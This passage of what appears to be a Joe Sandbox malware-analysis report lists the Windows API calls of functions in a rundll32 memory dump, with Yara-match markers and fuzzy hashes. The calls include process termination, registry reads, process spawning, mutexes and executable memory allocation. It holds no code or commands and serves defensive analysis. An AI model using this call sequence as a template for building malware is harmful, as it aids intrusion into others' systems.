                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
                                          Similarity
                                          • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                          • String ID:
                                          • API String ID: 90276831-0

                                          APIs
                                          • RtlImageNtHeader.NTDLL(?), ref: 00B6F99D
                                            • Part of subcall function 00B565B6: lstrlenW.KERNEL32(00000000,76DDF560,00000000,?,00000000,?,?,00B55512,00000020), ref: 00B565E2
                                            • Part of subcall function 00B565B6: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B565F4
                                            • Part of subcall function 00B565B6: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56611
                                            • Part of subcall function 00B565B6: lstrlenW.KERNEL32(00000000,?,?,00B55512,00000020), ref: 00B5661D
                                            • Part of subcall function 00B565B6: HeapFree.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56631
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B6F9D5
                                          • CloseHandle.KERNEL32(?), ref: 00B6F9E3
                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 00B6FABC
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B6FACB
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 00B6FADE
                                          Similarity
                                          • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                          • String ID:
                                          • API String ID: 1719504581-0

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,?), ref: 00B6D513
                                          • GetLastError.KERNEL32 ref: 00B6D539
                                          • SetEvent.KERNEL32(00000000), ref: 00B6D54C
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00B6D595
                                          • memset.NTDLL ref: 00B6D5AA
                                          • RtlExitUserThread.NTDLL(?), ref: 00B6D5DF
                                          Similarity
                                          • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                                          • String ID:
                                          • API String ID: 3978817377-0


                                          APIs
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • lstrlenW.KERNEL32(00000000,?), ref: 00B52551
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                          • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B52572
                                          • lstrlenW.KERNEL32(?), ref: 00B5259E
                                            • Part of subcall function 00B55A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B55B6A
                                            • Part of subcall function 00B55A14: RtlEnterCriticalSection.NTDLL(?), ref: 00B55BA0
                                            • Part of subcall function 00B55A14: RtlLeaveCriticalSection.NTDLL(?), ref: 00B55BBC
                                            • Part of subcall function 00B55A14: FindNextFileW.KERNEL32(?,00000000), ref: 00B55BD5
                                            • Part of subcall function 00B55A14: WaitForSingleObject.KERNEL32(00000000), ref: 00B55BE7
                                            • Part of subcall function 00B55A14: FindClose.KERNEL32(?), ref: 00B55BFC
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55C10
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55C32
                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00B525BB
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B525DC
                                          • PathFindFileNameW.SHLWAPI(0000001E), ref: 00B525F1
                                          Similarity
                                          • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                          • String ID:
                                          • API String ID: 2670873185-0

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000104,00B73407,00000000,?,?,00B580C4,?,?,?,00000000), ref: 00B59624
                                          • lstrlen.KERNEL32(?,00000104,00B73407,00000000,?,?,00B580C4,?,?,?), ref: 00B5963A
                                          • lstrlen.KERNEL32(?,00000104,00B73407,00000000,?,?,00B580C4,?,?,?), ref: 00B5964F
                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B596B4
                                          • _snprintf.NTDLL ref: 00B596DA
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 00B596F9
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFree_snprintf
                                          • String ID:
                                          • API String ID: 3180502281-0

                                          APIs
                                          • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B54819
                                          • CreateWaitableTimerA.KERNEL32(00B79208,?,?), ref: 00B54836
                                          • GetLastError.KERNEL32(?,?), ref: 00B54847
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 00B54887
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 00B548A6
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00B548BC
                                          Similarity
                                          • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                          • String ID:
                                          • API String ID: 1835239314-0

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020), ref: 00B58C9A
                                          • StrChrA.SHLWAPI(00000001,00000020), ref: 00B58CAB
                                            • Part of subcall function 00B5BF9A: lstrlen.KERNEL32(?,?,00000000,00000000,?,00B5C555,00000000,?,?,00000000,00000001), ref: 00B5BFAC
                                            • Part of subcall function 00B5BF9A: StrChrA.SHLWAPI(?,0000000D,?,00B5C555,00000000,?,?,00000000,00000001), ref: 00B5BFE4
                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B58CEB
                                          • memcpy.NTDLL(00000000,?,00000007), ref: 00B58D18
                                          • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 00B58D27
                                          • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 00B58D39
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0

                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00B52452
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B52463
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 00B5247E
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B52494
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00B524A6
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00B524BB
                                          Similarity
                                          • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                          • String ID:
                                          • API String ID: 1822509305-0

                                          APIs
                                          • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 00B532E5
                                          • _strupr.NTDLL ref: 00B53320
                                          • lstrlen.KERNEL32(00000000), ref: 00B53328
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 00B53367
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 00B5336E
                                          • GetLastError.KERNEL32 ref: 00B53376
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                          • String ID:
                                          • API String ID: 110452925-0

                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?), ref: 00B5A93F
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B5A96D
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5A97F
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B5A9A4
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5A9BF
                                          • RegCloseKey.ADVAPI32(?), ref: 00B5A9C9
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                          • String ID:
                                          • API String ID: 170146033-0

                                          APIs
                                          • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B876
                                          • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B87D
                                          • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00B5B88F
                                          • _snprintf.NTDLL ref: 00B5B8B5
                                            • Part of subcall function 00B5B968: memset.NTDLL ref: 00B5B97D
                                            • Part of subcall function 00B5B968: lstrlenW.KERNEL32(00000000,00000000,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9B6
                                            • Part of subcall function 00B5B968: wcstombs.NTDLL ref: 00B5B9C0
                                            • Part of subcall function 00B5B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9F1
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA1D
                                            • Part of subcall function 00B5B968: TerminateProcess.KERNEL32(?,000003E5), ref: 00B5BA33
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA47
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7A
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7F
                                          • _snprintf.NTDLL ref: 00B5B8E9
                                            • Part of subcall function 00B5B968: GetLastError.KERNEL32 ref: 00B5BA4B
                                            • Part of subcall function 00B5B968: GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B5BA6B
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00B5B906
                                          Similarity
                                          • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                          • String ID:
                                          • API String ID: 1481739438-0

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A7D5
                                          • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 00B5A7E8
                                          • lstrcpy.KERNEL32(00000008,00000000), ref: 00B5A80A
                                          • GetLastError.KERNEL32(00B55EAE,00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A833
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A84B
                                          • CloseHandle.KERNEL32(00000000,00B55EAE,00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A854
                                          Similarity
                                          • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 2860611006-0

                                          APIs
                                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                          • GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                          • GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                          • lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          Similarity
                                          • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 1175089793-0

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ErrorLastmemset
                                          • String ID: vids
                                          • API String ID: 3276359510-3767230166

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B56F18
                                          • lstrlen.KERNEL32(?,?), ref: 00B56F49
                                          • memcpy.NTDLL(00000008,?,00000001), ref: 00B56F58
                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 00B56FDA
                                          Strings
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlenmemcpy
                                          • String ID: W
                                          • API String ID: 379260646-655174618

                                          APIs
                                          • memset.NTDLL ref: 00B58F0C
                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 00B58F79
                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 00B58F83
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BuffersErrorFileFlushLastmemset
                                          • String ID: K$P
                                          • API String ID: 3817869962-420285281
                                          • Opcode ID: 324829981d8bbbf1d2e66bb1e6ff1328c62d7cac98fa157b11b51d2f96248d0d
                                          • Instruction ID: f352fee539370a5b492ee4a3b39b4d16a98e81d037a24df4e177fa0b8e411017
                                          • Opcode Fuzzy Hash: 324829981d8bbbf1d2e66bb1e6ff1328c62d7cac98fa157b11b51d2f96248d0d
                                          • Instruction Fuzzy Hash: 22418C30A00705DFDB208FA4DD8476EBBF2FF98316F5448ADE886A3641DB34A948CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memcpy.NTDLL(?,00B538D5,00000000,?,?,?,00B538D5,?,?,?,?,?), ref: 00B5F8A6
                                          • lstrlen.KERNEL32(00B538D5,?,?,?,00B538D5,?,?,?,?,?), ref: 00B5F8C4
                                          • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 00B5F933
                                          • lstrlen.KERNEL32(00B538D5,00000000,00000000,?,?,?,00B538D5,?,?,?,?,?), ref: 00B5F954
                                          • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 00B5F968
                                          • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 00B5F971
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B5F97F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlenmemcpy$FreeLocal
                                          • String ID:
                                          • API String ID: 1123625124-0
                                          • Opcode ID: 4adfbf1783d089a69a73cfeba0832711ca531a68c5591e623f23a9d55eb9b921
                                          • Instruction ID: 1b6c1356cce22d403981a914bfa08c58cbd7d28f87260551550c0ff1a79fb109
                                          • Opcode Fuzzy Hash: 4adfbf1783d089a69a73cfeba0832711ca531a68c5591e623f23a9d55eb9b921
                                          • Instruction Fuzzy Hash: 4E41167680021AAFDF11DF64DD459AB7BA8EF143A0B0444A5FD18A7211E731EE64CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(74DB06E0,00000000,00000000,74DB06E0,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AB8
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AD5
                                          • lstrlenW.KERNEL32(?,00000000,?,80000001,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B68CE2
                                          • lstrlenW.KERNEL32(00000008,?,80000001,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B68CE9
                                          • lstrlenW.KERNEL32(?,?,?,80000001,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B68D07
                                          • lstrlen.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B68DC5
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B68DD0
                                          • wsprintfA.USER32 ref: 00B68E12
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                                          • String ID:
                                          • API String ID: 1727939831-0
                                          • Opcode ID: 5f77b89fcac97d42d796d58d7280f229fc71898e2f9b3eaffcf7ad90e14e8499
                                          • Instruction ID: 3ab351b7706a23a780a06dfe54250d16c6d9c838c435a21a2f15bcbb43bb799f
                                          • Opcode Fuzzy Hash: 5f77b89fcac97d42d796d58d7280f229fc71898e2f9b3eaffcf7ad90e14e8499
                                          • Instruction Fuzzy Hash: A9515E7190020AAFCF019FA8DC45DAE7BFAEF48305B0540A5F908A7221DF3ADE55DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,00B6F51A,00000000,00000000), ref: 00B5FEF9
                                          • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 00B5FF8C
                                          • GetLastError.KERNEL32(?,?,0000011F), ref: 00B5FFE4
                                          • GetLastError.KERNEL32 ref: 00B60016
                                          • GetLastError.KERNEL32 ref: 00B6002A
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B6F51A,00000000,00000000,?,00B5D3E9,?), ref: 00B6003F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$memcpy
                                          • String ID:
                                          • API String ID: 2760375183-0
                                          • Opcode ID: b7cfe6fefdf35c7287619fac5d519e3c738e8f480f1bd44d903907a1f65e9fd4
                                          • Instruction ID: 46f48cb0f9998a65102188b5b8220de375aebe88de89743125e2fe38ad8bad80
                                          • Opcode Fuzzy Hash: b7cfe6fefdf35c7287619fac5d519e3c738e8f480f1bd44d903907a1f65e9fd4
                                          • Instruction Fuzzy Hash: E3518AB1900209FFDB10DFA9CC88AAEBBF9EB08351F1044A9F905E7250DB358E54DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(?,00000020), ref: 00B64A3B
                                          • lstrcat.KERNEL32(?,00000020), ref: 00B64A50
                                          • lstrcmp.KERNEL32(00000000,?), ref: 00B64A67
                                          • lstrlen.KERNEL32(?), ref: 00B64A8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3214092121-3916222277
                                          • Opcode ID: 755a36bd724c3c54ccaa0fe74603f8756b300da649478e7b5c12d9478e5cd1de
                                          • Instruction ID: 26ce51e597b2a59fc1a06c3f77048fda290699709a44b8406c903103142f789b
                                          • Opcode Fuzzy Hash: 755a36bd724c3c54ccaa0fe74603f8756b300da649478e7b5c12d9478e5cd1de
                                          • Instruction Fuzzy Hash: 5551BF31A80618EFCF21DF99C8846AEBBF6EF45315F15809AE8159B251C778AA41CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID:
                                          • API String ID: 1659193697-0
                                          • Opcode ID: 4ba28b95194a519a189f4b0e6ea2544a69aab05029dfbefc91e21c7e32a0ae39
                                          • Instruction ID: 26539cdab400991017e267350aa75d784e66611b9f928d92dea2c602d3549971
                                          • Opcode Fuzzy Hash: 4ba28b95194a519a189f4b0e6ea2544a69aab05029dfbefc91e21c7e32a0ae39
                                          • Instruction Fuzzy Hash: 1F411E75E0060AAFCB10DF9DC884BAEB7F9EF98305B1489E9DA15E3200D774DD098B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B70AD0: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 00B70ADC
                                            • Part of subcall function 00B70AD0: SetLastError.KERNEL32(000000B7,?,00B6B14C), ref: 00B70AED
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B6B16C
                                          • CloseHandle.KERNEL32(00000000), ref: 00B6B244
                                            • Part of subcall function 00B547FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B54819
                                            • Part of subcall function 00B547FF: CreateWaitableTimerA.KERNEL32(00B79208,?,?), ref: 00B54836
                                            • Part of subcall function 00B547FF: GetLastError.KERNEL32(?,?), ref: 00B54847
                                            • Part of subcall function 00B547FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 00B54887
                                            • Part of subcall function 00B547FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 00B548A6
                                            • Part of subcall function 00B547FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00B548BC
                                          • GetLastError.KERNEL32 ref: 00B6B22D
                                          • ReleaseMutex.KERNEL32(00000000), ref: 00B6B236
                                            • Part of subcall function 00B70AD0: CreateMutexA.KERNEL32(00B79208,00000000,?,?,00B6B14C), ref: 00B70B00
                                          • GetLastError.KERNEL32 ref: 00B6B251
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                          • String ID:
                                          • API String ID: 1700416623-0
                                          • Opcode ID: c4528a600e5a0e4b2217080ff42f583ca87412556e41cf4324b1be8ed2d0378f
                                          • Instruction ID: 28be6d3c69939a625bc3502c38abe7363eb4c788ffdbd87c5ef4fae5d6ee079b
                                          • Opcode Fuzzy Hash: c4528a600e5a0e4b2217080ff42f583ca87412556e41cf4324b1be8ed2d0378f
                                          • Instruction Fuzzy Hash: 52315475600244AFCB01AF74DC94DAE7FF6FB89315B2444A6E92AD7261DB3589C0CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B6B9BA
                                            • Part of subcall function 00B53AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B6A192), ref: 00B53B11
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,00000000,00B6D73E,00000000), ref: 00B6B9FC
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 00B6BA4E
                                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,00B6D73E,00000000), ref: 00B6BA67
                                            • Part of subcall function 00B56706: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B56727
                                            • Part of subcall function 00B56706: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00B5676A
                                          • GetLastError.KERNEL32(?,00000000,00B6D73E,00000000,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B6BA9F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                          • String ID:
                                          • API String ID: 1921436656-0
                                          • Opcode ID: 0cf124740f4338b39c915322eafebe02c404c68713d981878e874eab23c14cac
                                          • Instruction ID: 38c712510b5e8846f0aee7147e0fb1646790e494a0605de808689274abafdc13
                                          • Opcode Fuzzy Hash: 0cf124740f4338b39c915322eafebe02c404c68713d981878e874eab23c14cac
                                          • Instruction Fuzzy Hash: 5F315972A00209EFDB11DFA5DC85EAE7BF9EB08350F0004A5E909EB251DF349A84CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 00B58DD2
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B58DEB
                                          • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 00B58DF8
                                          • lstrlen.KERNEL32(00B7A3A8,?,?,?,?,?,00000000,00000000,?), ref: 00B58E0A
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 00B58E3B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                          • String ID:
                                          • API String ID: 2734445380-0
                                          • Opcode ID: 3bdc653adcd02619f56bab789dec36e301a6015e6a42485e051527b9bbe8ce62
